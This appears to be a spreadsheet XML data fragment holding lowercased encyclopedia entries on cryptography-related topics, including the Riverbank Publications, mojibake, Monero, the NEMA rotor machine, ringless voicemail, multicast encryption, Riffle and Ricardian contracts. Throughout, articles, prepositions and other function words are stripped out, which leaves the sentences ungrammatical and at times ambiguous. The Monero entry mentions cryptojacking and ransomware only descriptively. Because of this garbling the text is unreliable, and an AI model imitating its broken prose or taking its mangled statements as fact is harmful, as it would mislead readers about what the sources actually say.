    <t>riverbank publications series pamphlets written people worked millionaire george fabyan multi-discipline research facility built early 20th century near chicago. they published fabyan, often without author credit. publications cryptanalysis, mostly written william friedman, contributions elizebeth smith friedman others, considered seminal field. particular, publication introduced index coincidence, powerful statistical tool cryptanalysis. list publications cryptography riverbank publications dealt many subjects investigated laboratories. ones dealing cryptography began number 15,: consists method reconstructing primary alphabet from single series secondary alphabets, 1917: methods solution running-key ciphers, 1918: introduction methods solution ciphers, 1918: synoptic tables solution ciphers bibliography cryptographic literature, 1918: formulae solution geometrical transposition ciphers, written capt. lenox lohr, 1918: several machine ciphers methods solution, 1918: methods reconstruction primary alphabets, written elizebeth smith friedman, 1918: index coincidence applications cryptography, imprint fournier, paris, 1922: production detection messages concealed writing images, nolan, 1918 memorization methods: specifically illustrated respect their applicability codes topographic material, nolan, 1919,except noted, publications written william friedman published george fabyan's riverbank laboratories geneva, illinois. references</t>
  </si>
  <si>
    <t>Mojibake</t>
  </si>
  <si>
    <t>mojibake (japanese: 文字化け; ipa: [mod͡ʑibake]) garbled text result text decoded using unintended character encoding. result systematic replacement symbols completely unrelated ones, often different writing system. this display include generic replacement character ("�") places binary representation considered invalid. replacement also involve multiple consecutive symbols, viewed encoding, binary code constitutes symbol encoding. this either differing constant length encoding asian 16-bit encodings european 8-bit encodings), variable length encodings (notably utf-8 utf-16). failed rendering glyphs either missing fonts missing glyphs font different issue confused mojibake. symptoms failed rendering include blocks code point displayed hexadecimal using generic replacement character. importantly, replacements valid result correct error handling software. etymology mojibake means "character transformation" japanese. word composed (moji, ipa: [mod͡ʑi]), "character" (bake, ipa: [bäke̞], pronounced "bah-keh"), "transform". causes correctly reproduce original text encoded, correspondence encoded data notion encoding must preserved. mojibake instance non-compliance these, achieved manipulating data itself, relabeling mojibake often seen text data tagged wrong encoding; even tagged all, moved computers different default encodings. major source trouble communication protocols rely settings computer rather sending storing metadata together data. differing default settings computers part differing deployments unicode among operating system families, partly legacy encodings' specializations different writing systems human languages. whereas linux distributions mostly switched utf-8 2004, microsoft windows generally uses utf-16, sometimes uses 8-bit code pages text files different languages.for writing systems, example japanese, several encodings historically employed, causing users mojibake relatively often. japanese example, word mojibake "文字化け" stored euc-jp might incorrectly displayed "ﾊｸｻ�ｽ､ｱ", "ﾊｸｻ嵂ｽ､ｱ" (ms-932), "ﾊｸｻ郾ｽ､ｱ" (shift jis-2004). text stored utf-8 displayed "譁�蟄怜喧縺�" interpreted shift jis. this exacerbated locales involved: utf-8 text appears "æ–‡å­—åœ–ã‘" software assumes text windows-1252 iso-8859-1 encodings, usually labelled western, (for example) "鏂囧瓧鍖栥亼" interpreted (mainland china) locale. underspecification encoding specified, software decide means. depending type software, typical solution either configuration charset detection heuristics. both prone mis-prediction not-so-uncommon scenarios. encoding text files affected locale setting, depends user's language, brand operating system possibly conditions. therefore, assumed encoding systematically wrong files come computer different setting, even differently localized software within system. unicode, solution byte order mark, source code machine readable text, many parsers tolerate this. another storing encoding metadata file system. file systems support extended file attributes store user.charset. this also requires support software wants take advantage disturb software. while encodings easy detect, particular utf-8, many hard distinguish (see charset detection). browser able distinguish page coded euc-jp another shift-jis coding scheme assigned explicitly using http headers sent along documents, using html document's meta tags used substitute missing http headers server cannot configured send proper http headers; character encodings html. mis-specification mojibake also occurs encoding wrongly specified. this often happens encodings similar. example, eudora email client windows known send emails labelled iso-8859-1 reality windows-1252. windows-1252 contains extra printable characters range (the frequently seen curved quotation marks extra dashes), displayed properly software complying standard; especially affected software running operating systems unix. user oversight encodings still common use, many originated taking ascii appending atop result, encodings partially compatible other. examples include windows-1252 8859-1. people thus mistake expanded encoding using plain ascii. overspecification when layers protocols, trying specify encoding based different information, least certain information misleading recipient. example, consider server serving static html file http. character communicated client number ways: http header. this information based server configuration (for instance, serving file disk) controlled application running server (for dynamic websites). file, html meta (http-equiv charset) encoding attribute declaration. this encoding author meant save particular file file, byte order mark. this encoding author's editor actually saved unless accidental encoding conversion happened opening encoding saving another), correct. however, available unicode encodings utf-8 utf-16. lack hardware software support much older hardware typically designed support character character typically cannot altered. character table contained within display firmware localized characters country device sold typically table differs country country. such, systems potentially display mojibake loading text generated system different country. likewise, many early operating systems support multiple encoding formats thus displaying mojibake made display non-standard text—early versions microsoft windows palm example, localized per-country basis support encoding standards relevant country localized version sold display mojibake file containing text different encoding format version designed support opened. resolutions applications using utf-8 default encoding achieve greater degree interoperability widespread backward compatibility us-ascii. utf-8 also ability directly recognised simple algorithm, well written software able avoid mixing utf-8 encodings. difficulty resolving instance mojibake varies depending application within occurs causes common applications mojibake occur browsers word processors. modern browsers word processors often support wide array character encodings. browsers often allow user change rendering engine's encoding setting fly, word processors allow user select appropriate encoding opening file. take trial error users find correct encoding. problem gets complicated occurs application normally support wide range character encoding, non-unicode computer game. case, user must change operating system's encoding settings match game. however, changing system-wide encoding settings also cause mojibake pre-existing applications. windows later, user also option microsoft applocale, application allows changing per-application locale settings. even changing operating system encoding settings possible earlier operating systems windows resolve issue earlier operating systems, user would third party font rendering applications. problems different writing systems english mojibake english texts generally occurs punctuation, dashes (—), dashes (–), curly quotes (“,”,‘,’), rarely character text, since encodings agree ascii encoding english alphabet. example, pound sign appear "â£" encoded sender utf-8 interpreted recipient cp1252 8859-1. iterated using cp1252, lead "ã‚â£", "ãƒâ€šã‚â£", "ãƒæ’ã¢â‚¬å¡ãƒâ€šã‚â£", etc. some computers did, older eras, vendor-specific encodings caused mismatch also english text. commodore brand 8-bit computers used petscii encoding, particularly notable inverting upper lower case compared standard ascii. petscii printers worked fine computers era, flipped case letters. mainframes ebcdic encoding match ascii all. other western european languages alphabets north germanic languages, catalan, finnish, german, french, portuguese spanish extensions latin alphabet. additional characters typically ones become corrupted, making texts mildly unreadable mojibake: finnish swedish catalan norwegian danish dutch german faroese icelandic french italian spanish portuguese longer used) irish scottish gaelic british english… uppercase counterparts, applicable. these languages iso-8859-1 character (also known latin western) use. however, iso-8859-1 obsoleted competing standards, backward compatible windows-1252, slightly altered iso-8859-15. both euro sign french otherwise confusion three character sets create mojibake languages. furthermore, always safe interpret iso-8859-1 windows-1252, fairly safe interpret iso-8859-15, particular respect euro sign, replaces rarely used currency sign (¤). however, advent utf-8, mojibake become common certain scenarios, e.g. exchange text files unix windows computers, utf-8's incompatibility latin-1 windows-1252. utf-8 ability directly recognised simple algorithm, well written software able avoid mixing utf-8 encodings, common many software supporting utf-8. most languages supported ms-dos default cp437 machine default encodings, except ascii, problems buying operating system version less common. windows ms-dos compatible however. swedish, norwegian, danish german, vowels rarely repeated, usually obvious character gets corrupted, e.g. second letter "kã⁠¤rlek" (kärlek, "love"). this way, even though reader guess almost texts remain legible. finnish text, hand, feature repeating vowels words like hääyö ("wedding night") sometimes render text hard read (e.g. hääyö appears "hã⁠¤ã⁠¤yã⁠¶"). icelandic faroese eight possibly confounding characters, respectively, thus make difficult guess corrupted characters; icelandic words like þjóðlöð ("outstanding hospitality") become almost entirely unintelligible rendered "ã¾jã³ã°lã¶ã°". german, buchstabensalat ("letter salad") common term phenomenon, spanish, deformación (literally deformation). some users transliterate writing using computer, either omitting problematic diacritics, using digraph replacements etc.). thus, author might write "ueber" instead "über", standard practice german umlauts available. latter practice seems better tolerated german language sphere nordic countries. example, norwegian, digraphs associated archaic danish, used jokingly. however, digraphs useful communication parts world. example, norwegian football player gunnar solskjær name spelled "solskjaer" back played manchester united. artifact utf-8 misinterpreted iso-8859-1, "ring nã¥" ("ring nå"), seen scam raging norway june 2014. central eastern european users central eastern european languages also affected. because computers connected network mid- late-1980s, different character encodings every language diacritical characters (see iso/iec 8859 koi-8), often also varying operating system. hungarian hungarian another affected language, uses basic english characters, plus accented forms (all present latin-1 character set), plus characters latin-1. these characters correctly encoded latin-2, windows-1250 unicode. before unicode became common e-mail clients, e-mails containing hungarian text often letters corrupted, sometimes point unrecognizability. common respond e-mail rendered unreadable (see examples below) character mangling (referred "betűszemét", meaning "letter garbage") phrase "árvíztűrő tükörfúrógép", nonsense phrase (literally "flood-resistant mirror-drilling machine") containing accented characters used hungarian. examples polish prior creation 8859-2 1987, users various computing platforms used character encodings amigapl amiga, atari club atari masovia, cp852, mazovia windows cp1250 pcs. polish companies selling early computers created mutually-incompatible ways encode polish characters simply reprogrammed eproms video cards (typically cga, ega, hercules) provide hardware code pages needed glyphs polish—arbitrarily located without reference computer sellers placed them. situation began improve when, pressure academic user groups, 8859-2 succeeded "internet standard" limited support dominant vendors' software (today largely replaced unicode). with numerous problems caused variety encodings, even today users tend refer polish diacritical characters krzaczki ([ˈkʂät͜ʂ.ki], lit. "little shrubs"). russian cyrillic alphabets mojibake colloquially called krakozyabry (кракозя́бры [krɐkɐˈzʲæbrɪ̈]) russian, remains complicated several systems encoding cyrillic. soviet union early russian federation developed encodings (kod obmena informatsiey, обмена информацией, translates "code information exchange"). this began cyrillic-only 7-bit koi7, based ascii latin characters replaced cyrillic letters. then came 8-bit koi8 encoding ascii extension encodes cyrillic letters high-bit octets corresponding 7-bit codes koi7. reason koi8 text, even russian, remains partially readable stripping eighth bit, considered major advantage 8bitmime-unaware email systems. example, words "школа русского языка" shkola russkogo yazyka, encoded koi8 passed high stripping process, rendered "[kola russkogo qzyka". eventually koi8 gained different flavors russian bulgarian (koi8-r), ukrainian (koi8-u), belarusian (koi8-ru) even tajik (koi8-t). meanwhile, west, code page supported ukrainian belarusian well russian/bulgarian ms-dos. microsoft windows, code page 1251 added support serbian slavic variants cyrillic. most recently, unicode encoding includes code points practically characters world's languages, including cyrillic characters. before unicode, necessary match text encoding font using encoding system. failure produced unreadable gibberish whose specific appearance varied depending exact combination text encoding font encoding. example, attempting view non-unicode cyrillic text using font limited latin alphabet, using default ("western") encoding, typically results text consists almost entirely vowels diacritical marks. (koi8 "библиотека" (biblioteka, library) becomes "âéâìéïôåëá".) using windows codepage 1251 view text koi8 vice versa results garbled text consists mostly capital letters (koi8 codepage 1251 share ascii region, koi8 uppercase letters region codepage 1251 lowercase, vice versa). general, cyrillic gibberish symptomatic using wrong cyrillic font. during early years russian sector world wide web, koi8 codepage 1251 common. 2017, still encounter html pages codepage 1251 and, rarely, koi8 encodings, well unicode. estimated 1.7% pages worldwide languages included encoded codepage 1251.) though html standard includes ability specify encoding given page source, sometimes neglected, forcing user switch encodings browser manually. bulgarian, mojibake often called majmunica (маймуница), meaning "monkey's [alphabet]". serbian, called đubre (ђубре), meaning "trash". unlike former ussr, south slavs never used something like koi8, code page 1251 dominant cyrillic encoding unicode. therefore, languages experienced fewer encoding incompatibility troubles russian. 1980s, bulgarian computers used encoding, superficially similar (although incompatible with) cp866. yugoslav languages croatian, bosnian, serbian (the seceding varieties serbo-croatian language) slovenian basic latin alphabet letters capital counterparts (only č/č, slovenian; officially, although others used needed, mostly foreign names, well). letters defined latin-2 windows-1250, exist usual os-default windows-1252, languages. although mojibake occur characters, letters included windows-1252 much prone errors. thus, even nowadays, "šđčćž šđčćž" often displayed "šðèæž šðèæž", although never used slavic languages. when confined basic ascii (most user names, example), common replacements are: š→s, đ→dj, č→c, ć→c, (capital forms analogously, đ→dj đ→dj depending word case). replacements introduce ambiguities, reconstructing original form usually done manually required. windows-1252 encoding important english versions windows operating system widespread, localized ones. reasons include relatively small fragmented market, increasing price high quality localization, high degree software piracy turn caused high price software compared income), discourages localization efforts, people preferring english versions windows software.the drive differentiate croatian serbian, bosnian croatian serbian, even montenegrin three creates many problems. there many different localizations, using different standards different quality. there common translations vast amount computer terminology originating english. end, people adopted english words ("kompjuter" "computer", "kompajlirati" "compile," etc.), unaccustomed translated terms understand option menu supposed based translated phrase. therefore, people understand english, well accustomed english terminology (who most, english terminology also mostly taught schools problems) regularly choose original english versions non-specialist software. when cyrillic script used (for macedonian partially serbian), problem similar cyrillic-based scripts. newer versions english windows allow code page changed (older versions require special english versions support), setting often incorrectly set. example, windows windows non-right-to-left single-byte code pages including 1250, install time. caucasian languages writing systems certain languages caucasus region, including scripts georgian armenian, produce mojibake. this problem particularly acute case armscii armscii, obsolete character encodings armenian alphabet superseded unicode standards. armscii widely used lack support computer industry. example, microsoft windows support asian encodings another type mojibake occurs text erroneously parsed multi-byte encoding, encodings east asian languages. with kind mojibake (typically two) characters corrupted once, e.g. "k舐lek" (kärlek) swedish, "är" parsed "舐". compared mojibake, harder read, since letters unrelated problematic missing, especially problematic short words starting "än" (which becomes "舅"). since letters combined, mojibake also seems random (over variants compared normal three, counting rarer capitals). rare cases, entire text string happens include pattern particular word lengths, sentence "bush facts", misinterpreted. vietnamese vietnamese, phenomenon called loạn occur computer tries encode diacritic character defined windows-1258, tcvn3 utf-8. common vietnam using windows computers cheap mobile phones. japanese japanese, phenomenon mentioned, called mojibake (文字化け). particular problem japan numerous different encodings exist japanese text. alongside unicode encodings like utf-8 utf-16, standard encodings, shift-jis (windows machines) euc-jp (unix systems). mojibake, well encountered japanese users, also often encountered non-japanese attempting software written japanese market. chinese chinese, phenomenon called luàn (pinyin, simplified chinese traditional chinese meaning 'chaotic code'), occur computerised text encoded chinese character encoding displayed using wrong encoding. when occurs, often possible issue switching character encoding without loss data. situation complicated existence several chinese character encoding systems use, common ones being: unicode, big5, guobiao (with several backward compatible versions), possibility chinese characters encoded using japanese encoding. easy identify original encoding luanma occurs guobiao encodings: additional problem caused encodings missing characters, common rare antiquated characters still used personal place names. examples taiwanese politicians wang chien-shien (chinese: 王建煊; pinyin: wáng jiànxuān)'s "煊", shyi-kun (simplified chinese: 游锡堃; traditional chinese: 游錫堃; pinyin: xíkūn)'s singer david (chinese: pinyin: zhé)'s missing big5, ex-prc premier rongji (chinese: 朱镕基; pinyin: róngjī)'s missing 2312, copyright symbol missing gbk.newspapers dealt problem various ways, including using software combine existing, similar characters; using picture personality; simply substituting homophone rare character hope reader would able make correct inference. indic text similar effect occur brahmic indic scripts south asia, used indo-aryan indic languages hindustani (hindi-urdu), bengali, punjabi, marathi, others, even character employed properly recognized application. this because, many indic scripts, rules individual letter symbols combine create symbols syllables properly understood computer missing appropriate software, even glyphs individual letter forms available. example wikipedia logo, attempts show character analogous "wi" (the first syllable "wikipedia") many puzzle pieces. puzzle piece meant bear devanagari character "wi" instead used display "wa" character followed unpaired modifier vowel, easily recognizable mojibake generated computer configured display indic text. logo redesigned 2010 fixed errors. idea plain text requires operating system provide font display unicode codes. this font different singhala makes orthographically incorrect glyphs letters (syllables) across operating systems. instance, 'reph', short form diacritic normally goes plain letter. however, wrong letters like 'ya' 'la' specific contexts. sanskritic words names inherited modern languages, कार्य, iast: kārya, आर्या, iast: āryā, letters. contrast, similar sounds modern languages result specific rules, top, word करणाऱ्या, iast: karaṇāryā, stem form common word करणारा/री, iast: karaṇārā/rī, marathi language. happens operating systems. this appears fault internal programming fonts. ios, muurdhaja (dark combination long form yield wrong shapes.some indic indic-derived scripts, notably lao, officially supported windows release vista. however, various sites made free-to-download fonts. burmese western sanctions late arrival burmese language support computers, much early burmese localization homegrown without international cooperation. prevailing means burmese support zawgyi font, font created unicode font fact partially unicode compliant. zawgyi font, codepoints burmese script implemented specified unicode, others not. unicode consortium refers font encodings. with advent mobile phones, mobile vendors samsung huawei simply replaced unicode compliant system fonts zawgyi versions.due encodings, communications users zawgyi unicode would render garbled text. around issue, content producers would make posts zawgyi unicode. myanmar government designated october 2019 "u-day" officially switch unicode. full transition estimated take years. african languages certain writing systems africa, unencoded text unreadable. texts produce mojibake include horn africa ge'ez script ethiopia eritrea, used amharic, tigre, languages, somali language, employs osmanya alphabet. southern africa, mwangwego alphabet used write languages malawi mandombe alphabet created democratic republic congo, generally supported. various writing systems native west africa present similar problems, n'ko alphabet, used manding languages guinea, syllabary, used liberia. arabic another affected language arabic (see below). text becomes unreadable encodings match. examples examples article utf-8 browser setting, utf-8 easily recognisable, browser supports utf-8 recognise automatically, interpret something else utf-8. also code point replacement character substitute character newline conventions representing line break differ windows unix systems. though software supports conventions (which trivial), software must preserve display difference (e.g. version control systems data comparison tools) substantially difficult adhering convention. byte order mark in-band store encoding together data prepend this intention invisible humans using compliant software, design perceived "garbage characters" incompliant software (including many interpreters). html entities encoding special characters html, mostly optional, required certain characters escape interpretation markup.while failure apply transformation vulnerability (see cross-site scripting), applying many times results garbling characters. example, quotation mark becomes &amp;quot;, &amp;amp;quot;, &amp;amp;amp;quot; bush facts references external links dictionary definition mojibake wiktionary media related mojibake wikimedia commons</t>
  </si>
  <si>
    <t>Monero</t>
  </si>
  <si>
    <t>monero xmr) decentralized cryptocurrency. uses public distributed ledger privacy-enhancing technologies obfuscate transactions achieve anonymity fungibility. observers cannot decipher addresses trading monero, transaction amounts, address balances, transaction histories. protocol open source based cryptonote, concept described 2013 white paper authored nicolas saberhagen. cryptography community used concept design monero, deployed mainnet 2014. monero uses ring signatures, zero-knowledge proofs, "stealth addresses", address obscuring methods obfuscate transaction details. these features baked protocol, though users optionally share view keys third party auditing. transactions validated miner network running randomx, proof work algorithm. algorithm issues coins miners, designed resistant asic mining. monero third largest developer community among cryptocurrencies, behind bitcoin ethereum. privacy features attracted cypherpunks users desiring privacy measures provided cryptocurrencies. increasingly used illicit activities money laundering, darknet markets, ransomware, cryptojacking. united states internal revenue service (irs) posted bounties contractors develop monero tracing technologies. background monero's roots traced back cryptonote, cryptocurrency protocol first described white paper published nicolas saberhagen (presumed pseudonymous) october 2013. author described privacy anonymity "the important aspects electronic cash" called bitcoin's traceability "critical flaw". bitcointalk forum user "thankful_for_today" coded ideas coin dubbed bitmonero. other forum users disagreed thankful_for_today's direction bitmonero, forked 2014 create monero. monero translates coin esperanto, esperanto moneroj sometimes used plural. both saberhagen thankful_for_today remain anonymous.monero third largest community developers, behind bitcoin ethereum. protocol's lead maintainer previously south african developer riccardo spagni. much core development team chooses remain anonymous.improvements monero's protocol features are, part, task monero research (mrl). rotating cast researchers, scientist, cryptographers, developers. similar core development team, portion chooses remain anonymous otherwise work pseudonymously. privacy monero's features around privacy anonymity. even though public decentralized ledger, transaction details obfuscated. this contrasts bitcoin, transaction details, user addresses, wallet balances public transparent. these features given monero loyal following among crypto anarchists, cypherpunks, privacy advocates.the transaction outputs, notes, users sending monero obfuscated ring signatures, groups sender's outputs decoy outputs. encryption transaction amounts began 2017 implementation ring confidential transactions (ringcts). developers also implemented zero-knowledge proof method, "bulletproofs", guarantee transaction occurred without revealing value. monero recipients protected "stealth addresses", addresses generated users receive funds, untraceable owner network observer. these privacy features enforced network default, though users option share private view permit third party auditing wallet, transaction audit transaction.monero uses dandelion++, protocol obscures address devices producing transactions. this done method transaction broadcast propagation; transactions initially passed node monero's peer-to-peer network, repeated probabilistic method used determine transaction sent node broadcast many nodes process called flooding. this method motivated growing blockchain analysis market potential botnets analysis. efforts trace transactions april 2017, researchers highlighted three major threats monero users' privacy. first relies leveraging ring signature size zero, ability output amounts. second, "leveraging output merging", involves tracking transactions outputs belong user, send funds ("churning"). finally, "temporal analysis", shows predicting right output ring signature could potentially easier previously thought. monero development team responded already addressed first concern introduction ringcts january 2017, well mandating minimum size ring signatures march 2016. 2018, researchers presented possible vulnerabilities paper titled empirical analysis traceability monero blockchain". monero team responded march 2018.in september 2020, united states internal revenue service's criminal investigation division (irs-ci), posted $625,000 bounty contractors could develop tools help trace monero, privacy-enhanced cryptocurrencies, bitcoin lightning network, "layer protocols. contract awarded blockchain analysis groups chainalysis integra fec. mining monero uses proof work algorithm, randomx, validate transactions. method introduced november 2019 replace former algorithm cryptonightr. both algorithms designed resistant asic mining, commonly used mine cryptocurrencies bitcoin. monero mined somewhat efficiently consumer grade hardware x86, x86-64, gpus, design decision based monero project's opposition mining centralisation asic mining creates, also resulted monero's popularity among malware-based non-consensual miners. october 2021 monero project introduced p2pool, mining pool running sidechain gives participants full control node solo mining configurations. illicit monero's privacy features made popular illicit purposes. darknet markets monero common medium exchange darknet markets. august 2016, dark market alphabay permitted vendors start accepting monero alternative bitcoin. site taken offline enforcement 2017, relaunched 2021 monero sole permitted currency. reuters reported 2019 three five largest darknet markets accepted monero, though bitcoin still widely used form payment markets. mining malware hackers embedded malware websites applications hijack victim cpus mine monero (sometimes called cryptojacking). late 2017, malware antivirus service providers blocked coinhive, javascript implementation monero miner embedded websites apps, cases hackers. coinhive generated script alternative advertisements; website could embed website visitor's mine cryptocurrency visitor consuming content webpage, site owner getting percentage mined coins. some websites apps without informing visitors, hackers implemented drained visitors' cpus. result, script blocked companies offering blocking subscription lists, antivirus services, antimalware services. coinhive previously found hidden showtime-owned streaming platforms, well starbucks wi-fi hotspots argentina. researchers 2018 found similar malware mines monero sends il-sung university north korea. ransomware monero sometimes used ransomware groups. according cnbc, first half 2018, monero used cryptocurrency ransomware attacks.one group behind 2017 wannacry ransomware attack, shadow brokers, attempted exchange ransom collected bitcoin monero. technica fast company reported exchange successful, news reported service criminal attempted use, shapeshift, denied transfer. shadow brokers began accepting monero payment later 2017.in 2021, cnbc, financial times, newsweek reported demand monero increasing following recovery bitcoin ransom paid colonial pipeline cyber attack. 2021 hack forced pipeline $4.4m ransom bitcoin, though large portion recovered united states federal government following month. group behind attack, darkside, normally requests payment either bitcoin monero, charge 10-20% premium payments made bitcoin increased traceability risk. ransomware group revil removed option paying ransom bitcoin 2021, demanding monero. ransomware negotiators, groups help victims ransoms, contacted monero developers understand technology. despite this, cnbc reported bitcoin still currency choice demanded ransomware attacks, insurers refuse monero ransom payments traceability concerns. regulatory responses attribution monero illicit markets influenced exchanges forgo listing this made difficult users exchange monero fiat currencies cryptocurrencies. exchanges south korea australia delisted monero privacy coins regulatory pressure.in 2018, europol director wainwright wrote year would criminals shift using bitcoin using monero, well ethereum, dash, zcash. bloomberg reported demand monero authorities becoming better monitoring bitcoin blockchain. publicity after many online payment platforms shut access white nationalists following unite right rally 2017, them, including christopher cantwell andrew auernheimer ("weev"), started using promoting monero. december 2017, monero team announced partnership musicians several online stores monero used form payment merchandise. november 2018, bail bloc released mobile mines monero raise funds low-income defendants cannot otherwise cover bail. references external links official website</t>
  </si>
  <si>
    <t>NEMA (machine)</t>
  </si>
  <si>
    <t>history cryptography, nema (neue maschine) ("new machine"), also designated (tasten-druecker-maschine) ("key-stroke machine"), 10-wheel rotor machine designed swiss army world replacement enigma machines. history swiss became aware current machine, commercial enigma (the swiss broken allied german cryptanalysts. design begun 1941 1943 captain arthur alder, professor mathematics university bern. team designed machine also included professors hugo hadwiger heinrich emil weber.in spring 1944, first prototype become available. after modifications, design accepted march 1945, production machines began following month zellweger first machine entered service 1947. nema declassified july 1992, machines offered sale public 1994. machine nema uses wheels, four normal electrical rotors contacts scramble wired unique rotor type; electrical reflector (like enigma's umkehrwalze) pairwise cross connected contacts; remaining five "drive wheels", mechanical cams control stepping rotors reflector. wheels assembled axle pairs consisting drive wheel electrical rotor. nema machine weighs measures approximately 36×32×14 also fialka typex sigaba references further reading geoff sullivan frode weierud: swiss nema cipher machine. cryptologia, 23(4), october 1999, pp310–328. walter schmid: chiffriermaschine nema. pages, third edition, february 2005, hombrechtikon switzerland external links frode weierud's page nema photographs simulator david hamer's page nema includes records nema selling prices: lord's page nema includes scanned manuals jerry proc's nema page</t>
  </si>
  <si>
    <t>Ringless voicemail</t>
  </si>
  <si>
    <t>ringless voicemail, also called voicemail drop, method pre-recorded audio message placed voicemail inbox without associated telephone ringing first. this practice commonly associated spamming debt collection services. legal status united states although federal communications commission petitioned exempt practice robocall laws, petition dropped raised controversy.united states courts consistently ruled multiple times voicemail subject telephone consumer protection regular telephone call, effect making voicemail drops contain unsolicited advertisement debt collection calls illegal circumstances recipient phone number belongs rate limited account. such messages, therefore, violation subject fines civil liability, even call went unanswered voice message opened, person called need prove billed calls case. such messages also illegal cases phone number listed ftc's call list. legal status canada canada, crtc allows voice mail messages interrupt person's activities real-time. references</t>
  </si>
  <si>
    <t>Mulabhadra</t>
  </si>
  <si>
    <t>mūlabhadra (മൂലഭദ്ര) mūlabhadri (ml:മൂലഭദ്രി) secret method communication employed royal spies erstwhile travancore kingdom medieval period. scheme also colloquially referred mūlapatra. essentially cryptographic scheme involving partial transposition letters malayalam alphabet. scheme extensively used king marthanda varma (1706–1758) travancore kingdom spies oral written communication messages. fixed one-time unchangeable code much employ implementation contrast modern methods substitution ciphers involving utilisation generating system codes. mūlabhadra scheme known used governance part india period.the known speaker language currently mohan, ettumanoor, kottayam district, kerala. scheme following tables give transposition scheme used mulabhadra code. vowels consonants chillus mnemonic users developed mnemonic learn remember language. mnemonic similar sanskrit slokas. അകോഖഗോഘങശ്ചൈവ ചടോഞണതപോമനഃ യശോരഷോലസശ്ചൈവ examples also mlecchita vikalpa references</t>
  </si>
  <si>
    <t>Multicast encryption</t>
  </si>
  <si>
    <t>multicast enables node network address unit data specific group receivers. interactive multicast data link network layer, multicast, ethernet multicast mbms service cellular network, receivers join leave group using interaction channel. only copy data sent source, multiple copies created sent desired recipient network infrastructure nodes. example multicast, multicast group identified class address. host enters exits group using igmp (internet group management protocol). message sent multicast sent nodes network, intended nodes accept multicast frames. multicasting useful situations video conferencing online gaming. multicast used originally lans, ethernet best example. problem multicast communication difficult guarantee designated receivers receive data sent. this largely multicast groups always changing; users come time. solution problem ensuring chosen recipient obtains data known multicast encryption. standards (international organization standardization) states confidentiality, integrity, authentication, access control, non-repudiation considered creating secure system. confidentiality: unauthorized party access appropriate messages. integrity: messages cannot changed transit without discovered. authentication: message needs sent person/machine claims sent access control: only users enabled access data. non-repudiation: receiver prove sender actually sent message.to secure, members added group must restricted viewing past data. also, members removed group access future data. theories theory creation encryption protocol explains ideally, member group changes upon entrance exit member group. another theory suggests primary subsidized additional keys belonging legitimate group members. protocol called uftp (encrypted based multicast) created attempt solve problem. protocol designed three phases: announce/register, file transfer, completion/confirmation. latest version released 4/22/2020 source code available website. current alternatives today, alternative multicast encryption involves symmetric encryption data decoded intended receivers using traffic encryption (tek). changed time member joins leaves group. this feasible large groups. users must continuously connected obtain keys. another common method involves asymmetric keys. here, private shared shares given asymmetrically. initial member given number shares, passed group member. member valid share key, view message. also broadcast encryption references</t>
  </si>
  <si>
    <t>Multisignature</t>
  </si>
  <si>
    <t>multisignature (also multi-signature multisig) digital signature scheme allows group users sign single document. usually, multisignature algorithm produces joint signature compact collection distinct signatures users.multisignature adds additional security cryptocurrency transactions. multisig crypto wallets require parties involved creation type wallet agree transaction occur. references</t>
  </si>
  <si>
    <t>Riffle (anonymity network)</t>
  </si>
  <si>
    <t>riffle anonymity network developed researchers epfl response problems network. riffle employs verifiable shuffle symmetric-key algorithm. like tor, utilizes onion routing. according mit's larry hardesty, researchers qatar computing research institute demonstrated vulnerability tor's design.messages sent riffle forwarded altered compromised server. server attach proof order forward message.the main intended use-case anonymous file sharing. according lead project researcher, riffle intended complementary tor, replacement. also references external links riffle code github</t>
  </si>
  <si>
    <t>Murder in Samarkand</t>
  </si>
  <si>
    <t>murder samarkand (published title dirty diplomacy) non-fiction book british activist former ambassador uzbekistan, craig murray. book forms account period british ambassador tashkent 2002–2004. work explains murray sacrificed diplomatic career speak karimov administration's suppression human rights british double standards torture iraq. publishing difficulties book originally published mainstream (edinburgh) 2006 several battles. before publication, many potential readers contacted internet posts e-mail listings raise interest creating body public opinion, guard publisher 'bullied' printing book government pressure. these communications also mentioned supporting government documents originally planned inclusion forcibly removed copyright laws. this, despite murray's assertions many received formal release thus within public domain. their forced removal, murray said government "trying claw back limited gains freedom information uk", especially attempts close websites supporting documents posted instead. though many attempts proved successful, media interest also meant documents frequently re-surface mirror sites. cover controversy minor controversy involved choice photographs 2007 paperback edition, three photos previously appearing 2004 lonely planet guide central asia bradley mayhew, paul clammer michael kohn. neither shows samarkand. rear cover murder samarkand uses photo bukhara guide book's cover photo. murray's front cover uses sunset scene appeared page guide (and shows khiva). there copyright issues case photos licensed getty images. murray stated choose cover like "masculine" appearance. film version film version book development. paramount bought rights developed script written david hare. michael winterbottom attached direct actor steve coogan play murray. after disagreements script, paramount passed project, rights meaning else could produce hare's script. radio play following paramount's decision pass film script, david hare convinced release audio rights script, rewrote radio play. radio play murder samarkand broadcast february 2010 radio david tennant murray. play nominated best drama sony radio academy awards 2011. references external links murder samarkand, craig murray: tashkent tales terror tippling, independent, august 2006</t>
  </si>
  <si>
    <t>Ricardian contract</t>
  </si>
  <si>
    <t>ricardian contract, invented grigg 1996, method recording document contract law, linking securely systems, accounting, contract issuance value. robust identification cryptographic hash function, transparent readable text legal prose efficient markup language extract essential information. ricardian contract places defining elements legal agreement format expressed executed software. make format machine-readable, easily extracted computational purposes, readable ordinary text document lawyers contracting parties read essentials contract conveniently.from legal perspective, markup language embedded within mostly legal prose document leads reduced transaction costs, faster dispute resolution, better enforceability enhanced transparency. from computing perspective, ricardian contract software design pattern digitize documents participate within financial transactions, payments, without losing richness contracting tradition. publication content reference content unique cryptographic message digest eliminates frauds based multiple presentations.the method arises work grigg completed mid-1990s contributions ricardo, system assets transfers built 1995-1996 systemics included pattern. system design pattern named david ricardo honour seminal contribution international trade theory. definition ricardian contract defined single document isa) contract offered issuer holders, valuable right held holders, managed issuer, easily readable (like contract paper), readable programs (parsable like database), digitally signed, carrying keys server information, allied unique secure identifier diagram ricardian contract separates agreement parties across time domain. left "bowtie" representation, negotiation formation legally binding contract leads single parent document defines intent agreement. right, performance agreement might involve many transactions accounted for, logically separated meaning issue. join legal world accounting world formed hash transaction locks terms conditions precise deal parties including hash contract every relevant transaction record, operation transactions issuance contract cleanly separated thus perverse incentives eliminated. legal relationship role ricardian contract capture contractual relationship contracting parties assist later performance contract programs. contractual form, recording offer issuer holder. offer signed digitally within format offerer, typically using plaintext digital signature provided openpgp. acceptance contract typically formed signing/agreeing transaction refers hash contract. within context high-performance payment system, secure payment cite hash contract instrument paid, well paying payee parties quantity units. smart contracts system, acceptance would performed operating contract's code move state agreement forward. signing intent typically, signing 